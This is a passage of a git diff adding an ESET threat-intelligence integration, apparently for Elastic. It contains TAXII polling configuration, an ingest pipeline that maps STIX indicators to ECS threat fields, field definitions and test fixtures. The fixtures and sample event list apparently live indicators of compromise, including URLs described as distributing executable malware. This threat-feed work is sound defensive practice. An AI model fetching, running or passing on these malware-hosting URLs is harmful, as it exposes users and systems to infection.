application/taxii+json;version=2.1 + - set: + target: url.params.match[type] + value: indicator + - set: + target: url.params.limit + value: {{page_size}} + - set: + target: url.params.added_after + value: '[[ .cursor.timestamp ]]' + default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]' + +response.pagination: + - set: + target: url.params.added_after + value: >- + [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]] + fail_on_template_error: true + +response.split: + target: body.objects + +cursor: + timestamp: + value: >- + [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]] + ignore_empty_value: true + +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/ti_eset/data_stream/ip/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/ip/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..459c9fffc4e --- /dev/null +++ b/packages/ti_eset/data_stream/ip/elasticsearch/ilm/default_policy.json @@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "delete": { + "actions": { + "delete": {} + }, + "min_age": "7d" + }, + "hot": { + "actions": { + "rollover": { + "max_age": "2d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/ip/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/ip/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..5756fe8c4e7 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,149 @@ +--- +description: Pipeline for processing IP collection feed +processors: + - set: + field: ecs.version + value: '8.11.0' + - set: + field: event.kind + value: enrichment + - append: + field: event.category + value: threat + allow_duplicates: false + - append: + field: event.type + value: indicator + allow_duplicates: false + - set: + field: threat.indicator.provider + value: eset + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: eti + - drop: + if: ctx.eti?.type != 'indicator' + - set: + field: threat.feed.name + value: "ESET IP stix 2.1" + - date: + field: eti.created + target_field: "@timestamp" + formats: + - "ISO8601" + if: "ctx.eti?.created != null" + - date: + field: eti.modified + target_field: threat.indicator.last_seen + formats: + - "ISO8601" + if: "ctx.eti?.modified != null" + - set: + field: threat.indicator.modified_at + copy_from: threat.indicator.last_seen + if: "ctx.threat?.indicator?.last_seen != null" + - date: + field: eti.valid_until + target_field: eset.valid_until + formats: + - "ISO8601" + if: "ctx.eti?.valid_until != null" + - rename: + field: eti.id + target_field: eset.id + ignore_missing: true + - rename: + field: eti.description + target_field: threat.indicator.description + ignore_missing: true + - foreach: + field: eti.labels + processor: + append: + field: eset.labels + value: "{{_ingest._value}}" + ignore_missing: true + ignore_failure: true + if: ctx.eti?.labels != null + - script: + lang: painless + params: + "malicious-activity": 'High' + "phishing-activity": 'High' + "unwanted-activity": 'Medium' + "benign": 'Low' + if: ctx.eset?.labels != null + source: > + for (def label : ctx.eset.labels) { + if (params.containsKey(label)) { + ctx.threat.indicator.confidence = params.get(label); + break; + } + } + - split: + field: eti.pattern + target_field: eti._patterns + separator: ' OR ' + ignore_missing: true + - foreach: + field: eti._patterns + processor: + grok: + field: _ingest._value + patterns: + - "^\\[ipv4-addr:value%{SPACE}=%{SPACE}'%{IP:threat.indicator.ip}:%{NUMBER:threat.indicator.port:int}'\\]?" + - "^\\[ipv4-addr:value%{SPACE}=%{SPACE}'%{IP:threat.indicator.ip}/%{NUMBER}'\\]?" + - "^\\[ipv4-addr:value%{SPACE}=%{SPACE}'%{IP:threat.indicator.ip}'\\]?" + ignore_failure: true + - set: + field: threat.indicator.type + value: ipv4-addr + - set: + field: threat.indicator.name + copy_from: eti.name + if: "ctx.eti?.name != null" + - remove: + field: + - eti + ignore_missing: true + - remove: + field: event.original + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_failure: true + ignore_missing: true + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/ti_eset/data_stream/ip/fields/agent.yml b/packages/ti_eset/data_stream/ip/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/data_stream/ip/fields/base-fields.yml b/packages/ti_eset/data_stream/ip/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/data_stream/ip/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/data_stream/ip/fields/ecs.yml b/packages/ti_eset/data_stream/ip/fields/ecs.yml new file mode 100644 index 00000000000..532e63297da --- /dev/null +++ b/packages/ti_eset/data_stream/ip/fields/ecs.yml @@ -0,0 +1,40 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name +- external: ecs + name: threat.indicator.ip +- external: ecs + name: threat.indicator.port diff --git a/packages/ti_eset/data_stream/ip/fields/fields.yml b/packages/ti_eset/data_stream/ip/fields/fields.yml new file mode 100644 index 00000000000..bf7e7383df2 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/fields/fields.yml @@ -0,0 +1,21 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: 'true' + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_eset/data_stream/ip/lifecycle.yml b/packages/ti_eset/data_stream/ip/lifecycle.yml new file mode 100644 index 00000000000..326b14e00f6 --- /dev/null +++ b/packages/ti_eset/data_stream/ip/lifecycle.yml @@ -0,0 +1 @@ +data_retention: 7d diff --git a/packages/ti_eset/data_stream/ip/manifest.yml b/packages/ti_eset/data_stream/ip/manifest.yml new file mode 100644 index 00000000000..0a4125b24eb --- /dev/null +++ b/packages/ti_eset/data_stream/ip/manifest.yml @@ -0,0 +1,95 @@ +title: "IP" +type: logs +ilm_policy: logs-ti_eset.ip-default_policy +streams: + - input: httpjson + title: IP + description: Collect data from ETI IP feed + template_path: httpjson.yml.hbs + vars: + - name: url + description: URL with API root and identifier of IP collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514) + type: text + title: Collection URL + multi: false + required: true + show_user: true + default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/baaed2a92335418aa753fe944e13c23a/objects/ + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: false + default: 1m + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: interval + type: text + title: Interval + description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 1h + - name: initial_interval + type: text + title: Initial Interval + multi: false + required: true + show_user: false + default: 48h + description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s. + - name: page_size + type: integer + multi: false + required: false + default: "1000" + show_user: false + title: Page size + description: Maximum number of records to pull in one request. + - name: ssl + type: yaml + title: SSL + multi: false + required: false + show_user: false + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - eset-ip + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + diff --git a/packages/ti_eset/data_stream/ip/sample_event.json b/packages/ti_eset/data_stream/ip/sample_event.json new file mode 100644 index 00000000000..7772317080e --- /dev/null +++ b/packages/ti_eset/data_stream/ip/sample_event.json @@ -0,0 +1,67 @@ +{ + "@timestamp": "2023-10-19T02:20:06.000Z", + "agent": { + "ephemeral_id": "013ad9c0-d817-4490-a524-0b3f275d2f1a", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.ip", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--905fad40-d804-4b89-ac9d-b616e0b8f6d3", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:20:06.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:22:22.857Z", + "dataset": "ti_eset.ip", + "ingested": "2024-03-27T14:22:34Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:20:06.000Z\",\"description\":\"Web services scanning and attacks\",\"id\":\"indicator--905fad40-d804-4b89-ac9d-b616e0b8f6d3\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:20:06.000Z\",\"name\":\"5.2.75.227\",\"pattern\":\"[ipv4-addr:value='5.2.75.227']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:20:06Z\",\"valid_until\":\"2023-10-21T02:20:06Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-ip" + ], + "threat": { + "feed": { + "name": "ESET IP stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Web services scanning and attacks", + "ip": "5.2.75.227", + "last_seen": "2023-10-19T02:20:06.000Z", + "modified_at": "2023-10-19T02:20:06.000Z", + "name": "5.2.75.227", + "provider": "eset", + "type": "ipv4-addr" + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log new file mode 100644 index 00000000000..437bdb6d0a7 --- /dev/null +++ b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log @@ -0,0 +1,10 @@ +{"id": "indicator--1a481dbe-e9b4-4f4b-a138-9171b13aaf3d", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host is known to be actively distributing threats or is of uncertain reputation.", "pattern": "[url:value='http://www.gacetafinanciera.com/MKK_Internals/GLOBALIZFINAN.pdf']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--81565730-9217-49a5-aaf6-1331c29ec3a1", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='http://18.204.106.67/743576-1692568010.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["malicious-activity"]} +{"id": "indicator--56daf034-6fe6-4f3f-a201-bda39caf02f7", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='https://horacampinas.com.br/gm-de-valinhos-sera-a-1a-da-rmc-a-usar-fuzil-em-patrulhamento/']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--ec0a1762-4418-4b4a-8245-d6eeabb69a4c", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='https://www.bandt.com.au/lucid-agency-wins-philippines-tourism-account-to-drive-awareness-in-aunz/']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--512f9cc9-ec75-4502-b6ec-50baab95a3f9", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='http://www.iema.net/resources/reading-room/2020/06/26/iema-eia-guide-to-climate-change-resilience-and-adaptation-2020']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--c545b3d8-f6c1-4c8c-a7dc-9b4714fade27", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='http://18.204.106.67/736863-1697131982.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["malicious-activity"]} +{"id": "indicator--a6c01d1c-c14f-4dda-b3a2-7fdeeee59626", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='http://www.iztacala.unam.mx/carreras/psicologia/psiclin/vol9num2/vol9n2art1.pdf']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--6a2c6afd-37f3-4c71-9cd2-3378929115a9", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host is known to be actively distributing adware or other medium-risk software.", "pattern": "[url:value='https://paphoolred.com/afu.php']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["malicious-activity"]} +{"id": "indicator--c2c36c68-b456-41a1-aca8-1329655ed964", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='https://vitrea.macomp.co.il/netfiles/18501a092452EBEDBA048119DD7C4C7869634F6.pdf']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["benign"]} +{"id": "indicator--d2bf6040-34a3-4aee-9f99-779b3ef0c0c4", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:15.000Z", "modified": "2023-10-15T02:05:15.000Z", "name": "https://example.com/some/path", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[url:value='http://18.204.106.67/737375-1692567831.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:15Z", "valid_until": "2023-10-17T02:05:15Z", "labels": ["malicious-activity"]} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..4e801a07484 --- /dev/null +++ b/packages/ti_eset/data_stream/url/_dev/test/pipeline/test-eset-ndjson.log-expected.json @@ -0,0 +1,434 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--1a481dbe-e9b4-4f4b-a138-9171b13aaf3d", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--1a481dbe-e9b4-4f4b-a138-9171b13aaf3d\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host is known to be actively distributing threats or is of uncertain reputation.\", \"pattern\": \"[url:value='http://www.gacetafinanciera.com/MKK_Internals/GLOBALIZFINAN.pdf']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host is known to be actively distributing threats or is of uncertain reputation.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://www.gacetafinanciera.com/MKK_Internals/GLOBALIZFINAN.pdf" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--81565730-9217-49a5-aaf6-1331c29ec3a1", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--81565730-9217-49a5-aaf6-1331c29ec3a1\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='http://18.204.106.67/743576-1692568010.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "http://18.204.106.67/743576-1692568010.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--56daf034-6fe6-4f3f-a201-bda39caf02f7", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--56daf034-6fe6-4f3f-a201-bda39caf02f7\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='https://horacampinas.com.br/gm-de-valinhos-sera-a-1a-da-rmc-a-usar-fuzil-em-patrulhamento/']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://horacampinas.com.br/gm-de-valinhos-sera-a-1a-da-rmc-a-usar-fuzil-em-patrulhamento/" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--ec0a1762-4418-4b4a-8245-d6eeabb69a4c", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--ec0a1762-4418-4b4a-8245-d6eeabb69a4c\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='https://www.bandt.com.au/lucid-agency-wins-philippines-tourism-account-to-drive-awareness-in-aunz/']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://www.bandt.com.au/lucid-agency-wins-philippines-tourism-account-to-drive-awareness-in-aunz/" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:15.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--512f9cc9-ec75-4502-b6ec-50baab95a3f9", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:15.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--512f9cc9-ec75-4502-b6ec-50baab95a3f9\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:15.000Z\", \"modified\": \"2023-10-15T02:05:15.000Z\", \"name\": \"https://example.com/some/path\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[url:value='http://www.iema.net/resources/reading-room/2020/06/26/iema-eia-guide-to-climate-change-resilience-and-adaptation-2020']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:15Z\", \"valid_until\": \"2023-10-17T02:05:15Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET URL stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:15.000Z", + "modified_at": "2023-10-15T02:05:15.000Z", + "name": 